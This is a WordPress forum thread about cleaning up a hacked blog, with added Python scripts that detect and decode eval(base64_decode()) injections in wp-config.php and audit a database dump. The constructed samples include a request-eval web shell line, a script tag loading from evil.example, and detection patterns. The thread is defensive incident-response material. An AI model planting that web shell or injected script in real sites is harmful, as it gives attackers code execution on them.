Forum Replies Created

Viewing 5 replies - 1 through 5 (of 5 total)
  • Thread Starter jafro

    (@jafro)

    74.222.101.10: https://www.google.com/search?hl=en&q=employment+for+cokecola+in+bishopville+sc&btnG=Google+Search&aq=f&oq=

    71.207.208.143:
    https://www.google.com/search?q=watch+predator+x+history+channel+%2Bfull&hl=en&rlz=1T4ADBS_enUS311US311&start=10&sa=N

    They all seem to go to my wp-root-dir (/).

Here are some of the IPs hitting me, mostly from the US, but also from some other regions (NZ and NO, where I'm from).

    72.84.148.79 (US)
    71.207.208.143 (US)
    74.222.101.10 (US)
    74.222.101.10 (US)
    24.98.77.65 (US)
    222.152.253.250 (NZ)
    76.120.184.250 (US)
    173.66.164.227 (unknown)
    99.130.38.136 (US)
    24.91.27.86 (US)
    68.46.245.102 (US)
    129.241.125.53 (NO)

    Forum: Fixing WordPress
    In reply to: Possible Exploit?
    Thread Starter jafro

    (@jafro)

    Here is the answer from Dreamhost-support:

    Me:

"Since the other sites running on my server space aren't affected (or so it seems), I guess the attack is related to jafro.org. And since I always update to the latest WP version, I guess that the attack was related to me running a somewhat old theme (although I have never heard about something like that)."

    DH Support:
We've been seeing this more and more, as themes are starting to regularly include plugins that are built in. You'll need to keep those as up to date as possible as well.

I've had no problems since I removed the nasties and changed my skin. But I do find it quite annoying that it is possible to write code directly into wp-config.php, which is write-protected from all but my own user, but I guess that's the way it goes. Guess I will keep it read-only from now on.

    Is it possible to mark this thread as solved?

    Forum: Fixing WordPress
    In reply to: Possible Exploit?
    Thread Starter jafro

    (@jafro)

I found the bad tables in the DB, and managed to clean them out successfully by dropping the tables with mysqladmin. They contained the phrase "xhebjz". Here is an image of the table names.

Also, I had these ugly, encrypted entries in my wp-config.php, which, fantastically enough, I overlooked earlier today:

    // Change the prefix if you want to have multiple blogs in a single database.
    																	eval(base64_decode('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'));
    $table_prefix  = 'wp_';   // example: 'wp_' or 'b2' or 'mylogin_'
    																	eval(base64_decode('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'));

It would be great if anyone could decrypt them. The file was dated 12th December. The day 2.7 came out? Anyhow, the admin panel worked flawlessly just some days ago.

I guess this was an old, known exploit, which triggered because of my old theme (an old, adapted version of Kubrick). If anyone has a clue which exploit that was, I would appreciate it.

    Forum: Fixing WordPress
    In reply to: Possible Exploit?
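The two `eval(base64_decode('...'))` lines quoted in the post above are the usual shape of a PHP backdoor dropped into wp-config.php; the long run of tabs in front of each one is there to push the code off the right edge of an editor window so a quick glance misses it. The payloads themselves are not reproduced on this page, so the following is an added example (not code from the thread or from WordPress) showing how to find such lines in a PHP file and peel the base64 layers off them, since these payloads are often base64 wrapped inside base64. The `wp-config.php` sample it scans is constructed here for the demonstration, with a harmless two-layer payload standing in for the real one.

```python
import base64
import re
from typing import Dict, List

# Matches the injection shape seen in the post: eval(base64_decode('<b64>'));
# The trailing ';' is consumed so the line can be removed cleanly.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*;?",
    re.S,
)


def decode_layers(payload: str, max_depth: int = 5) -> List[str]:
    """Decode a base64 payload and keep unwrapping while the result is
    itself another eval(base64_decode(...)) stub. Returns every layer,
    innermost last, so the analyst sees the final plaintext PHP."""
    layers: List[str] = []
    current = payload
    for _ in range(max_depth):
        try:
            raw = base64.b64decode("".join(current.split()), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        decoded = raw.decode("utf-8", errors="replace")
        layers.append(decoded)
        inner = EVAL_B64.search(decoded)
        if not inner:
            break
        current = inner.group(1)
    return layers


def scan_php(source: str) -> List[Dict]:
    """Report every eval(base64_decode(...)) in a PHP source string with
    its 1-based line number and the decoded layers."""
    findings = []
    for m in EVAL_B64.finditer(source):
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "payload_len": len(m.group(1)),
            "layers": decode_layers(m.group(1)),
        })
    return findings


def remove_injections(source: str) -> str:
    """Return the source with every matched eval(base64_decode(...)) stub
    stripped; the surrounding legitimate lines are left untouched."""
    return EVAL_B64.sub("", source)


# --- Constructed sample (not the real payload from the post) -------------
INNER_PHP = "if (isset($_REQUEST['c'])) { eval($_REQUEST['c']); }"
MID_PHP = "eval(base64_decode('%s'));" % base64.b64encode(INNER_PHP.encode()).decode()
OUTER_B64 = base64.b64encode(MID_PHP.encode()).decode()

# Mirrors the layout in the post: one stub above $table_prefix, one below,
# each preceded by a wall of tabs to hide it off-screen.
SAMPLE_WP_CONFIG = (
    "<?php\n"
    "// Change the prefix if you want to have multiple blogs in a single database.\n"
    f"\t\t\t\t\t\t\t\t\t\teval(base64_decode('{OUTER_B64}'));\n"
    "$table_prefix  = 'wp_';   // example: 'wp_' or 'b2' or 'mylogin_'\n"
    f"\t\t\t\t\t\t\t\t\t\teval(base64_decode('{OUTER_B64}'));\n"
    "define('DB_NAME', 'wordpress');\n"
)

if __name__ == "__main__":
    for f in scan_php(SAMPLE_WP_CONFIG):
        print(f"line {f['line']}: {f['payload_len']} bytes of base64, "
              f"{len(f['layers'])} layer(s); innermost:\n  {f['layers'][-1]}")
```

Run it against the real file (`scan_php(open("wp-config.php").read())`) and compare the innermost layer against what a backdoor typically looks like: an `eval` of request data, a `preg_replace` with the `/e` modifier, or a remote fetch. One caveat on the permission point raised in the post: if PHP on the host runs as the same Unix user that owns wp-config.php, a read-only mode does not stop injected or vulnerable PHP from changing the mode back and writing the file, because the owner can always `chmod` it; it only stops other users.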
    Thread Starter jafro

    (@jafro)

    Using Control Panel you can look into the tables. A good test would be to see if there are more users in the users table than there are supposed to.

    I don’t understand how to actually do this step.

    Anyhow, I renamed my old wordpress-folder, and did a clean install of 2.7.1.

    Copied my old wp-config to new install.

    Blog got all white, but the new wp-install-admin-panel did find that the previous theme wasn’t there anymore and reverted to default theme.

    But the evil is still there. Guess the malicious code got in the DB then?

    Forum: Fixing WordPress
    In reply to: Possible Exploit?
    Thread Starter jafro

    (@jafro)

I agree, it does not seem interesting for anybody to do this to any blog. The admin would be the first to find out, and so far the rest of the blog itself is not harmed. Although, the issues I describe may be part of a partially failed exploit.

    I can’t:
    – change theme from admin-panel (freezes on loading preview)
    – export database from admin-panel

    I can:
    Export database with mysql-dump (but I don’t think I can understand from the contents there if there is malicious content in the database).

I guess this is good in one way: it most certainly motivates me to update the theme I use and clean out some old debris.
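Two of the posts above touch the same gap: the suggestion to check whether the users table holds more accounts than it should, and the remark that a mysqldump export is hard to read for malicious content. The following is an added example, not code from the thread or from WordPress, that reads a mysqldump text and reports three things a responder would look at first: table names that are not part of the WordPress core schema (the "xhebjz" tables the poster found would show up here), every login in the users table, and options whose value contains script or eval-style payloads. The core table list is assumed for the WordPress 2.7-era schema and is a parameter; the dump it parses is constructed inline for the demonstration.

```python
import re
from typing import Dict, List, Set

# Assumed core table set for the 2.7-era schema (wp_commentmeta came later);
# adjust for the installed version or pass your own set.
CORE_TABLES = ("posts", "comments", "links", "options", "postmeta", "terms",
               "term_taxonomy", "term_relationships", "users", "usermeta")

CREATE_RE = re.compile(r"CREATE TABLE `([^`]+)` \((.*?)\n\)", re.S)
COLUMN_RE = re.compile(r"^\s*`([^`]+)`", re.M)          # column defs, not KEY lines
INSERT_RE = re.compile(r"INSERT INTO `(\w+)` VALUES (.*);$", re.M)
SUSPECT_RE = re.compile(r"base64_decode|eval\(|<script|<iframe", re.I)


def core_tables(prefix: str = "wp_") -> Set[str]:
    return {prefix + t for t in CORE_TABLES}


def parse_rows(values_blob: str) -> List[List[str]]:
    """Split the (...),(...) part of an extended INSERT into rows of raw
    field strings, honouring single-quoted strings and backslash escapes
    so commas and parentheses inside values do not break a row."""
    rows, row, field = [], [], []
    in_str, depth, i, n = False, 0, 0, len(values_blob)
    while i < n:
        c = values_blob[i]
        if in_str:
            if c == "\\" and i + 1 < n:        # escaped char: keep literally
                field.append(values_blob[i + 1]); i += 2; continue
            if c == "'":
                in_str = False
            else:
                field.append(c)
        elif c == "'":
            in_str = True
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            row.append("".join(field)); field = []
            rows.append(row); row = []
        elif c == "," and depth == 1:
            row.append("".join(field)); field = []
        elif c.isspace() or c == ",":          # separator between rows
            pass
        else:
            field.append(c)
        i += 1
    return rows


def audit_dump(dump: str, prefix: str = "wp_") -> Dict[str, List[str]]:
    """Report non-core tables, all user logins, and options whose value
    looks like injected script from a mysqldump text."""
    columns = {m.group(1): COLUMN_RE.findall(m.group(2)) for m in CREATE_RE.finditer(dump)}
    rows: Dict[str, List[List[str]]] = {}
    for m in INSERT_RE.finditer(dump):
        rows.setdefault(m.group(1), []).extend(parse_rows(m.group(2)))

    report = {"unexpected_tables": sorted(set(columns) - core_tables(prefix)),
              "users": [], "suspicious_options": []}
    ucols = columns.get(prefix + "users", [])
    if "user_login" in ucols:
        li = ucols.index("user_login")
        report["users"] = [r[li] for r in rows.get(prefix + "users", [])]
    ocols = columns.get(prefix + "options", [])
    if "option_name" in ocols and "option_value" in ocols:
        ni, vi = ocols.index("option_name"), ocols.index("option_value")
        report["suspicious_options"] = [r[ni] for r in rows.get(prefix + "options", [])
                                        if SUSPECT_RE.search(r[vi])]
    return report


# --- Constructed sample dump (hashes, URLs and the extra table are made up) ---
SAMPLE_DUMP = r"""
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(64) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`)
);
INSERT INTO `wp_users` VALUES (1,'jafro','$P$Bfakehash1'),(2,'xhebjz','$P$Bfakehash2');
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(64) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  PRIMARY KEY (`option_id`)
);
INSERT INTO `wp_options` VALUES (1,'siteurl','http://example.org'),(2,'active_plugins','a:1:{i:0;s:15:\"hello/hello.php\";}'),(3,'rss_xhebjz','<script src=\"http://evil.example/x.js\"></script>');
CREATE TABLE `wp_xhebjz_cache` (
  `k` varchar(32) NOT NULL,
  PRIMARY KEY (`k`)
);
"""

if __name__ == "__main__":
    for key, val in audit_dump(SAMPLE_DUMP).items():
        print(f"{key}: {val}")
```

On a real export (`audit_dump(open("site.sql").read())`) every login that is not yours, every non-core table not explained by an installed plugin, and every flagged option is something to inspect before the database is trusted again; a clean re-install of the files, as the poster did, does nothing about a backdoor that lives in the options table.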
